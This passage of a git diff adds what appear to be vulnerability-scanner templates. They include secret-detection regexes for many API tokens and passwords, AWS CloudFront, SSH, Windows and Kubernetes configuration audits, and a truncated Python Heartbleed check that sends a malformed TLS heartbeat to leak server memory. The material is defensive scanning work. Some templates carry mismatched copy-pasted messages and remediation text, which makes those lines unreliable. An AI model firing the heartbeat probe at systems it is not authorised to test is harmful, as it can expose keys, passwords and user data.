docker_hub_password + regex: + - docker[_-]?hub[_-]?password(=| =|:| :) + part: body + - type: regex + name: docker_passwd + regex: + - docker[_-]?passwd(=| =|:| :) + part: body + - type: regex + name: docker_password + regex: + - docker[_-]?password(=| =|:| :) + part: body + - type: regex + name: docker_token + regex: + - docker[_-]?token(=| =|:| :) + part: body + - type: regex + name: dockerhub_password + regex: + - dockerhub[_-]?password(=| =|:| :) + part: body + - type: regex + name: doordash_auth_token + regex: + - doordash[_-]?auth[_-]?token(=| =|:| :) + part: body + - type: regex + name: dropbox_oauth_bearer + regex: + - dropbox[_-]?oauth[_-]?bearer(=| =|:| :) + part: body + - type: regex + name: droplet_travis_password + regex: + - droplet[_-]?travis[_-]?password(=| =|:| :) + part: body + - type: regex + name: env_github_oauth_token + regex: + - env[_-]?github[_-]?oauth[_-]?token(=| =|:| :) + part: body + - type: regex + name: env_heroku_api_key + regex: + - env[_-]?heroku[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: facebook_access_token + regex: + - (EAACEdEose0cBA[0-9A-Za-z]+) + part: body + - type: regex + name: firebase_api_json + regex: + - firebase[_-]?api[_-]?json(=| =|:| :) + part: body + - type: regex + name: firebase_api_token + regex: + - firebase[_-]?api[_-]?token(=| =|:| :) + part: body + - type: regex + name: firebase_key + regex: + - firebase[_-]?key(=| =|:| :) + part: body + - type: regex + name: firebase_token + regex: + - firebase[_-]?token(=| =|:| :) + part: body + - type: regex + name: firefox_secret + regex: + - firefox[_-]?secret(=| =|:| :) + part: body + - type: regex + name: ftp_pw + regex: + - ftp[_-]?pw(=| =|:| :) + part: body + - type: regex + name: gh_api_key + regex: + - gh[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: github_api_key + regex: + - github[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: github_oauth + regex: + - github[_-]?oauth(=| =|:| :) + part: body + - type: regex + name: github_token + regex: + - github[_-]?token(=| =|:| :) + part: body + - type: regex + name: github_tokens + regex: + - github[_-]?tokens(=| =|:| :) + part: body + - type: regex + name: google_client_id + regex: + - google[_-]?client[_-]?id(=| =|:| :) + part: body + - type: regex + name: google_client_secret + regex: + - google[_-]?client[_-]?secret(=| =|:| :) + part: body + - type: regex + name: google_maps_api_key + regex: + - google[_-]?maps[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: google_oauth + regex: + - (ya29.[0-9A-Za-z-_]+) + part: body + - type: regex + name: mailchimp + regex: + - (W(?:[a-f0-9]{32}(-us[0-9]{1,2}))a-zA-Z0-9) + part: body + - type: regex + name: mailgun_priv_key + regex: + - mailgun[_-]?priv[_-]?key(=| =|:| :) + part: body + - type: regex + name: mailgun_secret_api_key + regex: + - mailgun[_-]?secret[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: master_password + regex: + - (master_password).+ + part: body + - type: regex + name: mg_public_api_key + regex: + - mg[_-]?public[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: mysql_root_password + regex: + - mysql[_-]?root[_-]?password(=| =|:| :) + part: body + - type: regex + name: netlify_api_key + regex: + - netlify[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: rabbitmq_password + regex: + - rabbitmq[_-]?password(=| =|:| :) + part: body + - type: regex + name: rediscloud_url + regex: + - rediscloud[_-]?url(=| =|:| :) + part: body + - type: regex + name: release_gh_token + regex: + - release[_-]?gh[_-]?token(=| =|:| :) + part: body + - type: regex + name: rubygems_auth_token + regex: + - rubygems[_-]?auth[_-]?token(=| =|:| :) + part: body + - type: regex + name: travis_secure_env_vars + regex: + - travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :) + part: body + - type: regex + name: travis_token + regex: + - travis[_-]?token(=| =|:| :) + part: body + - type: regex + name: twilio_api_key + regex: + - twilio[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: twilio_api_secret + regex: + - twilio[_-]?api[_-]?secret(=| =|:| :) + part: body + - type: regex + name: twilio_chat_account_api_service + regex: + - twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :) + part: body + - type: regex + name: twilio_token + regex: + - twilio[_-]?token(=| =|:| :) + part: body + - type: regex + name: twitter_consumer_key + regex: + - twitter[_-]?consumer[_-]?key(=| =|:| :) + part: body + - type: regex + name: twitter_consumer_secret + regex: + - twitter[_-]?consumer[_-]?secret(=| =|:| :) + part: body + - type: regex + name: twitteroauthaccesssecret + regex: + - twitteroauthaccesssecret(=| =|:| :) + part: body + - type: regex + name: twitteroauthaccesstoken + regex: + - twitteroauthaccesstoken(=| =|:| :) + part: body + - type: regex + name: urban_master_secret + regex: + - urban[_-]?master[_-]?secret(=| =|:| :) + part: body + - type: regex + name: use_ssh + regex: + - use[_-]?ssh(=| =|:| :) + part: body + - type: regex + name: user_assets_access_key_id + regex: + - user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :) + part: body + - type: regex + name: virustotal_apikey + regex: + - virustotal[_-]?apikey(=| =|:| :) + part: body diff --git a/poc/auth/ssh-key-auth-required.yaml b/poc/auth/ssh-key-auth-required.yaml new file mode 100644 index 0000000000..61496daad8 --- /dev/null +++ b/poc/auth/ssh-key-auth-required.yaml @@ -0,0 +1,23 @@ +id: ssh-key-auth-required + +info: + name: Use SSH Key-Based Authentication + author: pussycat0x + severity: info + description: | + SSH key-based authentication is more secure than password-based authentication. + remediation: | + Change it to : PasswordAuthentication no + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "PasswordAuthentication yes" diff --git a/poc/auth/webui-login.yaml b/poc/auth/webui-login.yaml new file mode 100644 index 0000000000..6f3339ee58 --- /dev/null +++ b/poc/auth/webui-login.yaml @@ -0,0 +1,25 @@ +id: webui-login +info: + name: Web UI Login Page Detection + author: drewvravick + severity: high + description: | + Detects the presence of a web UI login page. + tags: + - web + - login + +requests: + - name: Web UI Login Page + path: + - "{{BaseURL}}/webui/" + method: GET + matchers-condition: and + matchers: + - type: word + part: body + words: + - "cisco" + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/aws/cloudfront-compress-object.yaml b/poc/aws/cloudfront-compress-object.yaml new file mode 100644 index 0000000000..39129bd982 --- /dev/null +++ b/poc/aws/cloudfront-compress-object.yaml @@ -0,0 +1,60 @@ +id: cloudfront-compress-object + +info: + name: CloudFront Compress Objects Automatically + author: DhiyaneshDK + severity: low + description: | + Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are configured to automatically compress content for web requests that include "Accept-Encoding: gzip" in the request header, in order to increase the websites/web applications performance and reduce bandwidth costs. + impact: | + Disabling "Compress Objects Automatically" in CloudFront can lead to increased data transfer costs and slower page load times, negatively impacting user experience and performance. + remediation: | + Enable "Compress Objects Automatically" in CloudFront to reduce data transfer sizes, enhance loading speeds, and improve overall performance for end users. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/compress-objects-automatically.html + - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/ServingCompressedFiles.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].Compress' --region $region --output text + + matchers: + - type: word + words: + - "False" + + extractors: + - type: dsl + dsl: + - '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"' \ No newline at end of file diff --git a/poc/aws/cloudfront-custom-certificates.yaml b/poc/aws/cloudfront-custom-certificates.yaml new file mode 100644 index 0000000000..13e5123ef6 --- /dev/null +++ b/poc/aws/cloudfront-custom-certificates.yaml @@ -0,0 +1,60 @@ +id: cloudfront-custom-certificates + +info: + name: Cloudfront Custom SSL/TLS Certificates - In Use + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Amazon CloudFront distributions are configured to use a custom SSL/TLS certificate instead of the default one. + impact: | + Failing to use custom SSL/TLS certificates in CloudFront can result in trust issues with end users, exposing your web content to man-in-the-middle attacks and potentially damaging your brand's reputation due to untrusted connection warnings. + remediation: | + Configure your Amazon CloudFront distribution to use custom SSL/TLS certificates to ensure secure and trusted connections for your users, enhancing data protection and maintaining brand integrity. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-distro-custom-tls.html + - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/CNAMEs.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --region $region --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.CloudFrontDefaultCertificate' --output text + + matchers: + - type: word + words: + - "False" + + extractors: + - type: dsl + dsl: + - '"Cloudfront Custom SSL/TLS Certificates " + distribution + " In Use"' \ No newline at end of file diff --git a/poc/aws/cloudfront-geo-restriction.yaml b/poc/aws/cloudfront-geo-restriction.yaml new file mode 100644 index 0000000000..7ae37b5966 --- /dev/null +++ b/poc/aws/cloudfront-geo-restriction.yaml @@ -0,0 +1,60 @@ +id: cloudfront-geo-restriction + +info: + name: CloudFront Geo Restriction - Not Enabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that geographic restriction is enabled for your Amazon CloudFront CDN distributions in order to allow or block viewers from specific locations (countries) from accessing your web content. + impact: | + Not enabling Geo Restriction in CloudFront exposes content to users from unauthorized regions, increasing the risk of content misuse, compliance violations, and potential security threats. + remediation: | + Enable Geo Restriction in CloudFront to control access to content based on geographic locations, ensuring only authorized users from designated regions can access specific resources. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/geo-restriction.html + - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/georestrictions.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution-config --id $distribution --query "DistributionConfig.Restrictions.GeoRestriction.RestrictionType" --region $region --output text + + matchers: + - type: word + words: + - "none" + + extractors: + - type: dsl + dsl: + - '"CloudFront Compress Objects Automatically " + distribution + " is Disabled"' \ No newline at end of file diff --git a/poc/aws/cloudfront-insecure-protocol.yaml b/poc/aws/cloudfront-insecure-protocol.yaml new file mode 100644 index 0000000000..bf0a22a7e6 --- /dev/null +++ b/poc/aws/cloudfront-insecure-protocol.yaml @@ -0,0 +1,60 @@ +id: cloudfront-insecure-protocol + +info: + name: CloudFront Insecure Origin SSL Protocols + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Amazon CloudFront Content Delivery Network (CDN) distributions are not using insecure SSL protocols (i.e. SSLv3) for HTTPS communication between CloudFront edge locations and custom origins. + impact: | + Insecure SSL protocols for CloudFront origins can expose sensitive data to interception and compromise, increasing the risk of man-in-the-middle attacks. + remediation: | + Configure your CloudFront distribution to enforce the use of secure SSL/TLS protocols (TLS 1.2 or higher) for all origins and disable support for outdated protocols like SSLv3 and TLS 1.0/1.1. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-insecure-origin-ssl-protocols.html + - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginSslProtocols.Items | []' --region $region --output json + + matchers: + - type: word + words: + - "SSLv3" + + extractors: + - type: dsl + dsl: + - '"CloudFront Uses SSLv3 Protocol in" + distribution' \ No newline at end of file diff --git a/poc/aws/cloudfront-integrated-waf.yaml b/poc/aws/cloudfront-integrated-waf.yaml new file mode 100644 index 0000000000..cbc2322d8d --- /dev/null +++ b/poc/aws/cloudfront-integrated-waf.yaml @@ -0,0 +1,66 @@ +id: cloudfront-integrated-waf + +info: + name: CloudFront Integrated With WAF + author: DhiyaneshDK + severity: medium + description: | + Ensure that all your Amazon CloudFront distributions are integrated with the Amazon Web Application Firewall (WAF) service to protect against application-layer attacks that can compromise the security of your websites/web applications or place unnecessary load on them + impact: | + Lack of integration between CloudFront and a Web Application Firewall (WAF) increases vulnerability to web-based attacks, including DDoS, SQL injection, and cross-site scripting (XSS). + remediation: | + Integrate CloudFront with an appropriate Web Application Firewall (WAF) to filter and monitor HTTP requests, providing enhanced protection against common web threats. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-integrated-with-waf.html + - http://docs.aws.amazon.com/waf/latest/developerguide/what-is-aws-waf.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.WebACLId' --region $region --output json + + matchers-condition: and + matchers: + - type: word + words: + - '""' + + - type: word + words: + - 'arn:' + negative: true + + extractors: + - type: dsl + dsl: + - '"CloudFront Integrated With WAF " + distribution + " is Disabled"' \ No newline at end of file diff --git a/poc/aws/cloudfront-logging-disabled.yaml b/poc/aws/cloudfront-logging-disabled.yaml new file mode 100644 index 0000000000..318780aa25 --- /dev/null +++ b/poc/aws/cloudfront-logging-disabled.yaml @@ -0,0 +1,60 @@ +id: cloudfront-logging-disabled + +info: + name: Cloudfront Logging Disabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that access (standard) logging is enabled for your Amazon CloudFront distributions in order to track all viewer requests for the web content delivered through the Content Delivery Network (CDN). + impact: | + Disabling CloudFront logging reduces visibility into traffic patterns, hinders incident response and forensic analysis, compromises compliance efforts, and limits troubleshooting capabilities, increasing security risks. + remediation: | + Enable encryption for all existing EBS volumes and ensure that all new volumes created are configured to use encryption by default. Additionally, update any snapshots to be encrypted and use AWS Key Management Service (KMS) to manage encryption keys securely. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-logging-enabled.html + - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/AccessLogs.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Logging.Enabled' --region $region --output text + + matchers: + - type: word + words: + - "False" + + extractors: + - type: dsl + dsl: + - '"Cloudfront Logging " + distribution + " is Disabled"' diff --git a/poc/aws/cloudfront-origin-shield.yaml b/poc/aws/cloudfront-origin-shield.yaml new file mode 100644 index 0000000000..ba8aadf79c --- /dev/null +++ b/poc/aws/cloudfront-origin-shield.yaml @@ -0,0 +1,60 @@ +id: cloudfront-origin-shield + +info: + name: CloudFront Origin Shield - Not Enabled + author: DhiyaneshDK + severity: medium + description: | + Ensure that the Origin Shield performance optimization feature is enabled for all your Amazon CloudFront distributions in order to help reduce the load on your distribution's origin, improve its availability, and reduce its operating costs. + impact: | + Not enabling CloudFront Origin Shield can lead to increased load on your origin server, higher latency, and greater costs due to more frequent requests during traffic spikes. + remediation: | + Enable CloudFront Origin Shield for your distributions to optimize cache efficiency, reduce load on your origin server, and improve content delivery performance during high traffic periods. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/enable-origin-shield.html + - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/origin-shield.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.Origins.Items[*].OriginShield.Enabled' --region $region --output text + + matchers: + - type: word + words: + - "False" + + extractors: + - type: dsl + dsl: + - '"CloudFront Origin Shield " + distribution + " not Enabled"' \ No newline at end of file diff --git a/poc/aws/cloudfront-security-policy.yaml b/poc/aws/cloudfront-security-policy.yaml new file mode 100644 index 0000000000..cf82557056 --- /dev/null +++ b/poc/aws/cloudfront-security-policy.yaml @@ -0,0 +1,64 @@ +id: cloudfront-security-policy + +info: + name: CloudFront Security Policy + author: DhiyaneshDK + severity: medium + description: | + Ensure that your Amazon CloudFront distributions are using a security policy with minimum TLSv1.2 or TLSv1.3 and appropriate security ciphers for HTTPS viewer connections. + impact: | + Failing to use a security policy with a minimum of TLSv1.2 or TLSv1.3 and appropriate ciphers for HTTPS viewer connections in CloudFront can expose sensitive data to interception and reduce the overall security of your application. + remediation: | + Configure your Amazon CloudFront distributions to use a security policy that enforces a minimum of TLSv1.2 or TLSv1.3 and specifies secure ciphers for HTTPS viewer connections. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/security-policy.html + - https://aws.amazon.com/about-aws/whats-new/2017/09/amazon-cloudfront-now-lets-you-select-a-security-policy-with-minimum-tls-v1_1-1_2-and-security-ciphers-for-viewer-connections/ + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.ViewerCertificate.MinimumProtocolVersion' --region $region --output json + + matchers: + - type: word + words: + - '"TLSv1"' + - '"TLSv1_2016"' + - '"TLSv1.1_2016"' + - '"TLSv1.2_2018"' + - '"TLSv1.2_2019"' + + extractors: + - type: dsl + dsl: + - '"CloudFront Uses Insecure Protocols " + distribution' \ No newline at end of file diff --git a/poc/aws/cloudfront-traffic-unencrypted.yaml b/poc/aws/cloudfront-traffic-unencrypted.yaml new file mode 100644 index 0000000000..33b3984bad --- /dev/null +++ b/poc/aws/cloudfront-traffic-unencrypted.yaml @@ -0,0 +1,60 @@ +id: cloudfront-traffic-unencrypted + +info: + name: CloudFront Traffic To Origin Unencrypted + author: DhiyaneshDK + severity: medium + description: | + Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit. + impact: | + Unencrypted traffic between CloudFront and custom origins can expose sensitive data during transmission, leading to potential data breaches and non-compliance with encryption standards. + remediation: | + Ensure that all communications between your Amazon CloudFront distributions and custom origins are encrypted by configuring them to use HTTPS, thereby securing the delivery of web content and meeting compliance requirements for encryption in transit. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/cloudfront-traffic-to-origin-unencrypted.html + - http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/SecureConnections.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution --id $distribution --query 'Distribution.DistributionConfig.Origins.Items[*].CustomOriginConfig.OriginProtocolPolicy' --region $region --output json + + matchers: + - type: word + words: + - '"http-only"' + + extractors: + - type: dsl + dsl: + - '"CloudFront " + distribution + " uses HTTP Only"' \ No newline at end of file diff --git a/poc/aws/cloudfront-viewer-policy.yaml b/poc/aws/cloudfront-viewer-policy.yaml new file mode 100644 index 0000000000..01cb7235c8 --- /dev/null +++ b/poc/aws/cloudfront-viewer-policy.yaml @@ -0,0 +1,60 @@ +id: cloudfront-viewer-policy + +info: + name: CloudFront Viewer Protocol Policy + author: DhiyaneshDK + severity: medium + description: | + Ensure that the communication between your Amazon CloudFront distribution and its viewers is encrypted using HTTPS in order to secure the delivery of your web content. + impact: | + Failing to enforce HTTPS for viewer connections in CloudFront can expose web content to interception and manipulation, compromising the security and integrity of sensitive data transmitted between users and the distribution + remediation: | + Configure your Amazon CloudFront distribution's viewer protocol policy to either redirect HTTP requests to HTTPS or require HTTPS connections exclusively, ensuring secure delivery of web content and protecting against potential data breaches. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/CloudFront/viewer-protocol-policy.html + - https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/distribution-web-values-specify.html + tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let DistributionListItemsId of iterate(template.distributions)){ + set("distribution", DistributionListItemsId) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + + source: | + aws cloudfront list-distributions --output table --query 'DistributionList.Items[*].Id' --region $region --output json + + extractors: + - type: json + name: distributions + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + + source: | + aws cloudfront get-distribution-config --id $distribution --query 'DistributionConfig.CacheBehaviors.Items[*].ViewerProtocolPolicy' --output json --region $region + + matchers: + - type: word + words: + - '"allow-all"' + + extractors: + - type: dsl + dsl: + - '"CloudFront Viewer Policy " + distribution + " allows all"' \ No newline at end of file diff --git a/poc/config/device-guard-not-configured.yaml b/poc/config/device-guard-not-configured.yaml new file mode 100644 index 0000000000..c11879bcca --- /dev/null +++ b/poc/config/device-guard-not-configured.yaml @@ -0,0 +1,35 @@ +id: device-guard-not-configured + +info: + name: Device Guard Not Configured + author: princechaddha + severity: high + description: Verifies if Device Guard is not configured, reducing protection against unauthorized code execution. + impact: | + Not configuring Device Guard reduces the system's ability to block unauthorized code execution. + remediation: | + Configure Device Guard to enhance system protection. + tags: device-guard,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard + + matchers: + - type: regex + regex: + - 'SecurityServicesConfigured\s+:\s+\{0\}' + - 'SecurityServicesRunning\s+:\s+\{0\}' + - 'VirtualizationBasedSecurityStatus\s+:\s+0' + condition: or diff --git a/poc/config/k8s-liveness-probe-not-configured.yaml b/poc/config/k8s-liveness-probe-not-configured.yaml new file mode 100644 index 0000000000..9fb2e658b9 --- /dev/null +++ b/poc/config/k8s-liveness-probe-not-configured.yaml @@ -0,0 +1,48 @@ +id: k8s-liveness-probe-not-configured + +info: + name: Liveness Probe Not Configured in Deployments + author: princechaddha + severity: medium + description: Checks for missing liveness probes in Kubernetes Deployments, which are essential for managing container health and automatic recovery + impact: | + Absence of liveness probes can lead to unresponsive containers remaining in service, potentially degrading application performance and availability. + remediation: Configure liveness probes for all containers in Kubernetes Deployments to ensure proper health checks and automatic restarts of failing containers + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.livenessProbe)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks a configured liveness probe.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502203467396f69842d95717ea1f6208909f0301e79ef8e16b19ad5e20978826124f2022100b31af5d5f6daf8463350c27aaf6398d6f27378fa5858cc4f1908749790a1dcc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-0160.yaml b/poc/cve/CVE-2014-0160.yaml new file mode 100644 index 0000000000..9f07823532 --- /dev/null +++ b/poc/cve/CVE-2014-0160.yaml @@ -0,0 +1,137 @@ +id: CVE-2014-0160 + +info: + name: OpenSSL Heartbleed Vulnerability + author: pussycat0x + severity: high + description: | + The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users. + reference: + - https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160 + metadata: + verified: true + tags: cve,cve2014,openssl,heartbleed,code + +variables: + url: "{{RootURL}}" + +code: + - engine: + - py + - python3 + source: | + import os + import struct + import socket + import time + import select + from urllib.parse import urlparse + + def h2bin(x): + return bytes.fromhex(x.replace(' ', '').replace('\n', '')) + + hello = h2bin(''' + 16 03 02 00 dc 01 00 00 d8 03 02 53 + 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf + bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 + 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 + 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c + c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 + c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 + c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c + c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 + 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 + 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 + 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 + 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 + 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 + 00 0f 00 01 01 + ''') + + hb = h2bin(''' + 18 03 02 00 03 + 01 40 00 + ''') + + def recvall(s, length, timeout=5): + endtime = time.time() + timeout + rdata = b'' + remain = length + while remain > 0: + rtime = endtime - time.time() + if rtime < 0: + return None + r, _, _ = select.select([s], [], [], 5) + if s in r: + data = s.recv(remain) + if not data: + return None + rdata += data + remain -= len(data) + return rdata + + def recvmsg(s): + hdr = recvall(s, 5) + if hdr is None: + return None, None, None + typ, ver, ln = struct.unpack('>BHH', hdr) + pay = recvall(s, ln, 10) + if pay is None: + return None, None, None + return typ, ver, pay + + def hit_hb(s): + s.send(hb) + while True: + typ, ver, pay = recvmsg(s) + if typ is None: + return False + if typ == 24: # Heartbeat response + if len(pay) > 3: + print('server is vulnerable') + return True + return False + if typ == 21: # Server alert + return False + + def main(): + # Get the URL from the environment variable + url = os.getenv('url') + if not url: + print("URL environment variable is not set.") + return + + # Parse the URL + parsed_url = urlparse(url) + host = parsed_url.hostname + port = parsed_url.port if parsed_url.port else 443 + + if not host: + return + + # Create a socket connection + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + + # Send Client Hello + s.send(hello) + + # Wait for Server Hello + while True: + typ, ver, pay = recvmsg(s) + if typ is None: + return + if typ == 22 and pay[0] == 0x0E: # Server hello done + break + + # Send Heartbeat request and check vulnerability + 